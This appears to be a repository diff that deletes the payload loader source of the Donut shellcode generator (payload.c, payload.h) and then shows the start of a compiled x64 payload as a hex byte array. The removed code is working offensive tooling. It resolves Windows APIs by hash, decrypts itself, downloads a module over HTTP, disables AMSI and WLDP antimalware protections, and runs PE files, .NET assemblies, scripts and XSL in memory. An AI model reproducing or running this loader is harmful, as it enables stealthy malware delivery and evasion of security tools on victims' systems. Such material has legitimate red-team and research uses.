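-MEM_COMMIT | MEM_RESERVE,
-PAGE_READWRITE);
-
-if(xsl_str != NULL) {
-// 2. Convert string to unicode.
-inst->api.MultiByteToWideChar(CP_ACP, 0, mod->data,
--1, xsl_str, mod->len * sizeof(WCHAR));
-
-// 3. Initialize COM
-DPRINT("CoInitializeEx");
-hr = inst->api.CoInitializeEx(NULL, COINIT_MULTITHREADED);
-
-if(hr == S_OK) {
-// 4. Instantiate XMLDOMDocument object
-DPRINT("CoCreateInstance");
-hr = inst->api.CoCreateInstance(
-&inst->xCLSID_DOMDocument30,
-NULL, CLSCTX_INPROC_SERVER,
-&inst->xIID_IXMLDOMDocument,
-(void**)&pDoc);
-
-if(hr == S_OK) {
-// 5. load XSL file
-DPRINT("IXMLDOMDocument::loadXML");
-hr = pDoc->lpVtbl->loadXML(pDoc, (BSTR)xsl_str, &loaded);
-DPRINT("HRESULT: %08lx loaded : %s",
-hr, loaded ? "TRUE" : "FALSE");
-
-if(hr == S_OK && loaded) {
-// 6. query node interface
-DPRINT("IXMLDOMDocument::QueryInterface");
-hr = pDoc->lpVtbl->QueryInterface(
-pDoc, &inst->xIID_IXMLDOMNode, (void **)&pNode);
-
-if(hr == S_OK) {
-DPRINT("HRESULT: %08lx", hr);
-// 7. execute script
-DPRINT("IXMLDOMDocument::transformNode");
-hr = pDoc->lpVtbl->transformNode(pDoc, pNode, &res);
-DPRINT("HRESULT: %08lx", hr);
-pNode->lpVtbl->Release(pNode);
-}
-}
-pDoc->lpVtbl->Release(pDoc);
-}
-DPRINT("CoUninitialize");
-inst->api.CoUninitialize();
-}
-DPRINT("Erasing XSL from memory.");
-Memset(xsl_str, 0, (inst->mod_len + 1) * sizeof(WCHAR));
-
-DPRINT("VirtualFree()");
-inst->api.VirtualFree(xsl_str, 0, MEM_RELEASE | MEM_DECOMMIT);
-}
-}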
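--- a/payload/order.txt
+++ /dev/null
@@ -1 +0,0 @@
-ThreadProc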
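--- a/payload/payload.c
+++ /dev/null
@@ -1,267 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#include "payload.h"
-
-DWORD ThreadProc(LPVOID lpParameter) {
-ULONG i, ofs;
-ULONG64 sig;
-PDONUT_INSTANCE inst = (PDONUT_INSTANCE)lpParameter;
-DONUT_ASSEMBLY assembly;
-PDONUT_MODULE mod;
-VirtualAlloc_t _VirtualAlloc;
-VirtualFree_t _VirtualFree;
-LPVOID pv;
-ULONG64 hash;
-BOOL disabled;
-
-DPRINT("Maru IV : %" PRIX64, inst->iv);
-
-hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualAlloc) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
-DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
-_VirtualAlloc = (VirtualAlloc_t)xGetProcAddress(inst, hash, inst->iv);
-
-hash = inst->api.hash[ (offsetof(DONUT_INSTANCE, api.VirtualFree) - offsetof(DONUT_INSTANCE, api)) / sizeof(ULONG_PTR)];
-DPRINT("Resolving address for VirtualAlloc() : %" PRIX64, hash);
-_VirtualFree = (VirtualFree_t) xGetProcAddress(inst, hash, inst->iv);
-
-if(_VirtualAlloc == NULL || _VirtualFree == NULL) {
-DPRINT("FAILED!.");
-return -1;
-}
-
-DPRINT("VirtualAlloc : %p VirtualFree : %p",
-(LPVOID)_VirtualAlloc, (LPVOID)_VirtualFree);
-
-DPRINT("Allocating %i bytes of RW memory", inst->len);
-pv = _VirtualAlloc(NULL, inst->len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-
-if(pv == NULL) {
-DPRINT("Memory allocation failed...");
-return -1;
-}
-DPRINT("Copying %i bytes of data to memory %p", inst->len, pv);
-Memcpy(pv, lpParameter, inst->len);
-inst = (PDONUT_INSTANCE)pv;
-
-DPRINT("Zero initializing PDONUT_ASSEMBLY");
-Memset(&assembly, 0, sizeof(assembly));
-
-#if !defined(NOCRYPTO)
-PBYTE inst_data;
-// load pointer to data just past len + key
-inst_data = (PBYTE)inst + offsetof(DONUT_INSTANCE, api_cnt);
-
-DPRINT("Decrypting %li bytes of instance", inst->len);
-
-donut_decrypt(inst->key.mk,
-inst->key.ctr,
-inst_data,
-inst->len - offsetof(DONUT_INSTANCE, api_cnt));
-
-DPRINT("Generating hash to verify decryption");
-ULONG64 mac = maru(inst->sig, inst->iv);
-DPRINT("Instance : %016llx | Result : %016llx", inst->mac, mac);
-
-if(mac != inst->mac) {
-DPRINT("Decryption of instance failed");
-goto erase_memory;
-}
-#endif
-DPRINT("Resolving LoadLibraryA");
-
-inst->api.addr[0] = xGetProcAddress(inst, inst->api.hash[0], inst->iv);
-if(inst->api.addr[0] == NULL) return -1;
-
-for(i=0; i<inst->dll_cnt; i++) {
-DPRINT("Loading %s ...", inst->dll_name[i]);
-inst->api.LoadLibraryA(inst->dll_name[i]);
-}
-
-DPRINT("Resolving %i API", inst->api_cnt);
-
-for(i=1; i<inst->api_cnt; i++) {
-DPRINT("Resolving API address for %016llX", inst->api.hash[i]);
-
-inst->api.addr[i] = xGetProcAddress(inst, inst->api.hash[i], inst->iv);
-
-if(inst->api.addr[i] == NULL) {
-DPRINT("Failed to resolve API");
-goto erase_memory;
-}
-}
-
-if(inst->type == DONUT_INSTANCE_URL) {
-DPRINT("Instance is URL");
-if(!DownloadModule(inst)) goto erase_memory;
-}
-
-if(inst->type == DONUT_INSTANCE_PIC) {
-DPRINT("Using module embedded in instance");
-mod = (PDONUT_MODULE)&inst->module.x;
-} else {
-DPRINT("Loading module from allocated memory");
-mod = inst->module.p;
-}
-
-// try bypassing AMSI and WLDP?
-if(inst->bypass != DONUT_BYPASS_SKIP) {
-// Try to disable AMSI
-disabled = DisableAMSI(inst);
-DPRINT("DisableAMSI %s", disabled ? "OK" : "FAILED");
-if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
-goto erase_memory;
-
-// Try to disable WLDP
-disabled = DisableWLDP(inst);
-DPRINT("DisableWLDP %s", disabled ? "OK" : "FAILED");
-if(!disabled && inst->bypass == DONUT_BYPASS_ABORT)
-goto erase_memory;
-}
-
-// unmanaged EXE/DLL?
-if(mod->type == DONUT_MODULE_DLL ||
-mod->type == DONUT_MODULE_EXE) {
-RunPE(inst);
-} else
-// .NET EXE/DLL?
-if(mod->type == DONUT_MODULE_NET_DLL ||
-mod->type == DONUT_MODULE_NET_EXE)
-{
-if(LoadAssembly(inst, &assembly)) {
-RunAssembly(inst, &assembly);
-}
-FreeAssembly(inst, &assembly);
-} else
-// vbs or js?
-if(mod->type == DONUT_MODULE_VBS ||
-mod->type == DONUT_MODULE_JS)
-{
-RunScript(inst);
-} else
-// xsl?
-if(mod->type == DONUT_MODULE_XSL) {
-RunXSL(inst);
-}
-
-erase_memory:
-// if module was downloaded
-if(inst->type == DONUT_INSTANCE_URL) {
-if(inst->module.p != NULL) {
-// overwrite memory with zeros
-Memset(inst->module.p, 0, (DWORD)inst->mod_len);
-
-// free memory
-inst->api.VirtualFree(inst->module.p, 0, MEM_RELEASE | MEM_DECOMMIT);
-inst->module.p = NULL;
-}
-}
-
-DPRINT("Erasing RW memory for instance");
-Memset(inst, 0, inst->len);
-
-DPRINT("Releasing RW memory for instance");
-_VirtualFree(inst, 0, MEM_DECOMMIT | MEM_RELEASE);
-
-return 0;
-}
-
-#include "http_client.c" // For downloading module
-
-#include "inmem_dotnet.c" // .NET assemblies
-#include "inmem_pe.c" // Unmanaged PE/DLL files
-#include "inmem_xsl.c" // XSL files
-#include "inmem_script.c" // VBS/JS files
-
-#include "peb.c" // resolve functions in export table
-
-#include "bypass.c" // Bypass AMSI and WLDP
-#include "getpc.c" // code stub to return program counter (always at the end!)
-
-// the following code is *only* for development purposes
-// given an instance file, it will run as if running on a target system
-// attach a debugger to host process
-#ifdef DEBUG
-
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-#include <sys/stat.h>
-
-int main(int argc, char *argv[]) {
-FILE *fd;
-struct stat fs;
-PDONUT_INSTANCE inst;
-DWORD old;
-
-if(argc != 2) {
-printf(" [ usage: payload <instance>\n");
-return 0;
-}
-// get size of instance
-if(stat(argv[1], &fs) != 0) {
-printf(" [ unable to obtain size of instance.\n");
-return 0;
-}
-
-// zero size?
-if(fs.st_size == 0) {
-printf(" [ invalid instance.\n");
-return 0;
-}
-
-// try open for reading
-fd = fopen(argv[1], "rb");
-if(fd == NULL) {
-printf(" [ unable to open %s.\n", argv[1]);
-return 0;
-}
-
-// allocate memory
-inst = (PDONUT_INSTANCE)VirtualAlloc(NULL, fs.st_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-
-if(inst != NULL) {
-fread(inst, 1, fs.st_size, fd);
-
-// change protection to PAGE_EXECUTE_READ
-if(VirtualProtect((LPVOID)inst, fs.st_size, PAGE_EXECUTE_READ, &old)) {
-printf("Running...");
-
-// run payload with instance
-ThreadProc(inst);
-}
-// deallocate
-VirtualFree((LPVOID)inst, 0, MEM_DECOMMIT | MEM_RELEASE);
-}
-fclose(fd);
-return 0;
-}
-#endif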
+0
-145
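--- a/payload/payload.h
+++ b/payload/payload.h
@@ -1,145 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#ifndef PAYLOAD_H
-#define PAYLOAD_H
-
-#if !defined(_MSC_VER)
-#define __out_ecount_full(x)
-#define __out_ecount_full_opt(x)
-#include <inttypes.h>
-#endif
-
-#include <windows.h>
-#include <wincrypt.h>
-#include <oleauto.h>
-#include <objbase.h>
-#include <wininet.h>
-
-#pragma comment(lib, "wininet.lib")
-#pragma comment(lib, "advapi32.lib")
-#pragma comment(lib, "crypt32.lib")
-
-#if defined(DEBUG)
-#include <stdio.h>
-#include <string.h>
-
-#define __FILENAME__ (strrchr(__FILE__, '\\') ? strrchr(__FILE__, '\\') + 1 : __FILE__)
-
-#define DPRINT(...) { \
-fprintf(stderr, "\nDEBUG: %s:%d:%s(): ", __FILENAME__, __LINE__, __FUNCTION__); \
-fprintf(stderr, __VA_ARGS__); \
-}
-#else
-#define DPRINT(...) // Don't do anything in release builds
-#endif
-
-#define STATIC_KEY ((__TIME__[7] - '0') * 1 + (__TIME__[6] - '0') * 10 + \
-(__TIME__[4] - '0') * 60 + (__TIME__[3] - '0') * 600 + \
-(__TIME__[1] - '0') * 3600 + (__TIME__[0] - '0') * 36000)
-
-// Relative Virtual Address to Virtual Address
-#define RVA2VA(type, base, rva) (type)((ULONG_PTR) base + rva)
-
-#if defined(_M_IX86) || defined(__i386__)
-// return pointer to code in memory
-char *get_pc(void);
-
-// PC-relative addressing for x86 code. Similar to RVA2VA except using functions in payload
-#define ADR(type, addr) (type)(get_pc() - ((ULONG_PTR)&get_pc - (ULONG_PTR)addr))
-#else
-#define ADR(type, addr) (type)(addr) // do nothing on 64-bit
-#endif
-
-void *Memset(void *ptr, int value, size_t num);
-void *Memcpy(void *destination, const void *source, size_t num);
-int Memcmp(const void *ptr1, const void *ptr2, size_t num);
-
-#if !defined(_MSC_VER)
-#define memcmp(x,y,z) Memcmp(x,y,z)
-#endif
-
-#include "peb.h" // Process Environment Block
-#include "winapi.h" // Prototypes
-#include "clr.h" // Common Language Runtime Interface
-
-#include "donut.h"
-
-#include "amsi.h" // Anti-malware Scan Interface
-#include "activescript.h" // Interfaces for executing VBS/JS files
-#include "wscript.h" // Interfaces to support WScript object
-
-typedef struct {
-IActiveScriptSite site;
-IActiveScriptSiteWindow siteWnd;
-IHost wscript;
-HANDLE hEvent;
-PDONUT_INSTANCE inst; //
-} MyIActiveScriptSite;
-
-// internal structure
-typedef struct _DONUT_ASSEMBLY {
-ICLRMetaHost *icmh;
-ICLRRuntimeInfo *icri;
-ICorRuntimeHost *icrh;
-IUnknown *iu;
-AppDomain *ad;
-Assembly *as;
-Type *type;
-MethodInfo *mi;
-} DONUT_ASSEMBLY, *PDONUT_ASSEMBLY;
-
-// Downloads a module from remote HTTP server into memory
-BOOL DownloadModule(PDONUT_INSTANCE);
-
-// .NET DLL/EXE
-BOOL LoadAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
-BOOL RunAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
-VOID FreeAssembly(PDONUT_INSTANCE, PDONUT_ASSEMBLY);
-
-// Extensible Stylesheet Language Transformations
-VOID RunXSL(PDONUT_INSTANCE);
-
-// In-Memory execution of native DLL
-VOID RunPE(PDONUT_INSTANCE);
-
-// VBS / JS files
-VOID RunScript(PDONUT_INSTANCE);
-
-// Disables Antimalware Scan Interface
-BOOL DisableAMSI(PDONUT_INSTANCE);
-
-// Disables Windows Lockdown Policy
-BOOL DisableWLDP(PDONUT_INSTANCE);
-
-LPVOID xGetProcAddress(PDONUT_INSTANCE, ULONGLONG, ULONGLONG);
-
-#endif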
+0
-1361
payload/payload_exe_x64.h less more
0
1 unsigned char PAYLOAD_EXE_X64[] = {
2 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48,
3 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xe8, 0x48,
4 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x89, 0x45, 0xe0, 0x48,
5 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48,
6 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x7f, 0x34,
7 0x00, 0x00, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
8 0x40, 0x50, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
9 0x48, 0x28, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89,
10 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x54, 0x34, 0x00, 0x00, 0x48, 0x89, 0x45,
11 0xd0, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x74, 0x07, 0x48, 0x83, 0x7d, 0xd0,
12 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xf5, 0x03, 0x00,
13 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45,
14 0xd8, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30, 0x00,
15 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xc8,
16 0x48, 0x83, 0x7d, 0xc8, 0x00, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff,
17 0xe9, 0xc1, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89,
18 0xc2, 0x48, 0x8b, 0x45, 0xc8, 0x49, 0x89, 0xd0, 0x48, 0x8b, 0x55, 0x10,
19 0x48, 0x89, 0xc1, 0xe8, 0xf4, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xc8,
20 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x41,
21 0xb8, 0x40, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89,
22 0xc1, 0xe8, 0x8a, 0x38, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05,
23 0x30, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xe8,
24 0x8b, 0x00, 0x89, 0xc0, 0x4c, 0x8d, 0x80, 0xd0, 0xfd, 0xff, 0xff, 0x48,
25 0x8b, 0x45, 0xe8, 0x48, 0x8d, 0x50, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48,
26 0x83, 0xc0, 0x04, 0x48, 0x8b, 0x4d, 0xc0, 0x4d, 0x89, 0xc1, 0x49, 0x89,
27 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x36, 0x3d, 0x00, 0x00, 0x48, 0x8b, 0x45,
28 0xe8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x8d, 0x8a,
29 0x18, 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xfd, 0x39, 0x00, 0x00,
30 0x48, 0x89, 0x45, 0xb8, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x18,
31 0x07, 0x00, 0x00, 0x48, 0x3b, 0x45, 0xb8, 0x0f, 0x85, 0x58, 0x02, 0x00,
32 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45,
33 0xe8, 0x48, 0x8b, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x49, 0x89, 0xc8,
34 0x48, 0x89, 0xc1, 0xe8, 0x35, 0x33, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48,
35 0x8b, 0x45, 0xe8, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b, 0x45, 0xe8, 0x48,
36 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff,
37 0xff, 0xe9, 0xd0, 0x02, 0x00, 0x00, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00,
38 0x00, 0xeb, 0x2a, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x30, 0x8b,
39 0x55, 0xfc, 0x48, 0xc1, 0xe2, 0x05, 0x48, 0x8d, 0x8a, 0x30, 0x02, 0x00,
40 0x00, 0x48, 0x8b, 0x55, 0xe8, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2, 0x08,
41 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45,
42 0xe8, 0x8b, 0x80, 0x34, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0xc7,
43 0xc7, 0x45, 0xfc, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x54, 0x48, 0x8b, 0x45,
44 0xe8, 0x48, 0x8b, 0x48, 0x28, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc,
45 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x14, 0xd0, 0x48, 0x8b, 0x45, 0xe8,
46 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0xa2, 0x32, 0x00, 0x00, 0x48,
47 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc, 0x48, 0x83, 0xc2,
48 0x06, 0x48, 0x89, 0x0c, 0xd0, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xfc,
49 0x48, 0x83, 0xc2, 0x06, 0x48, 0x8b, 0x04, 0xd0, 0x48, 0x85, 0xc0, 0x0f,
50 0x84, 0x7f, 0x01, 0x00, 0x00, 0x83, 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45,
51 0xe8, 0x8b, 0x80, 0x30, 0x02, 0x00, 0x00, 0x3b, 0x45, 0xfc, 0x77, 0x9d,
52 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8,
53 0x02, 0x75, 0x14, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x10,
54 0x02, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x4c, 0x01, 0x00, 0x00, 0x48,
55 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01,
56 0x75, 0x10, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00,
57 0x48, 0x89, 0x45, 0xf0, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b,
58 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45,
59 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x50,
60 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x33, 0x00, 0x00,
61 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75, 0x13, 0x48, 0x8b, 0x45,
62 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84,
63 0xea, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8,
64 0xe8, 0x34, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x83, 0x7d, 0xb4, 0x00, 0x75,
65 0x13, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x40, 0x03, 0x00, 0x00, 0x83,
66 0xf8, 0x02, 0x0f, 0x84, 0xc5, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0,
67 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x74, 0x0b, 0x48, 0x8b, 0x45, 0xf0, 0x8b,
68 0x00, 0x83, 0xf8, 0x04, 0x75, 0x11, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89,
69 0xc1, 0xe8, 0xf0, 0x12, 0x00, 0x00, 0xe9, 0x9f, 0x00, 0x00, 0x00, 0x48,
70 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0b, 0x48, 0x8b,
71 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x3f, 0x48, 0x8d, 0x95,
72 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8,
73 0x5f, 0x06, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x13, 0x48, 0x8d, 0x95, 0x70,
74 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x0c,
75 0x0a, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0xff, 0xff, 0xff, 0x48, 0x8b,
76 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x10, 0x00, 0x00, 0xeb, 0x4a,
77 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x05, 0x74, 0x0b, 0x48,
78 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x0e, 0x48, 0x8b,
79 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x91, 0x1d, 0x00, 0x00, 0xeb, 0x26,
80 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0x83, 0xf8, 0x07, 0x75, 0x1b, 0x48,
81 0x8b, 0x45, 0xe8, 0x48, 0x89, 0xc1, 0xe8, 0x60, 0x1b, 0x00, 0x00, 0xeb,
82 0x0d, 0x90, 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb,
83 0x01, 0x90, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00,
84 0x83, 0xf8, 0x02, 0x75, 0x67, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x80,
85 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x57, 0x48, 0x8b, 0x45,
86 0xe8, 0x48, 0x8b, 0x80, 0x40, 0x07, 0x00, 0x00, 0x89, 0xc2, 0x48, 0x8b,
87 0x45, 0xe8, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00, 0x49, 0x89, 0xd0,
88 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6b, 0x35, 0x00,
89 0x00, 0x48, 0x8b, 0x45, 0xe8, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55,
90 0xe8, 0x48, 0x8b, 0x8a, 0x48, 0x07, 0x00, 0x00, 0x41, 0xb8, 0x00, 0xc0,
91 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x8b, 0x45,
92 0xe8, 0x48, 0xc7, 0x80, 0x48, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
93 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xe8,
94 0x49, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8,
95 0x20, 0x35, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x8b, 0x45, 0xd0,
96 0x41, 0xb8, 0x00, 0xc0, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff,
97 0xd0, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xb0, 0x00, 0x00,
98 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x00, 0x03, 0x00, 0x00, 0x48,
99 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0x90, 0x02,
100 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
101 0xc7, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85,
102 0x74, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x78, 0x02,
103 0x00, 0x00, 0x00, 0x02, 0x60, 0x84, 0x48, 0x8d, 0x85, 0xc0, 0x01, 0x00,
104 0x00, 0x41, 0xb8, 0x68, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00,
105 0x48, 0x89, 0xc1, 0xe8, 0xa4, 0x34, 0x00, 0x00, 0xc7, 0x85, 0xc0, 0x01,
106 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xc0, 0x00, 0x00,
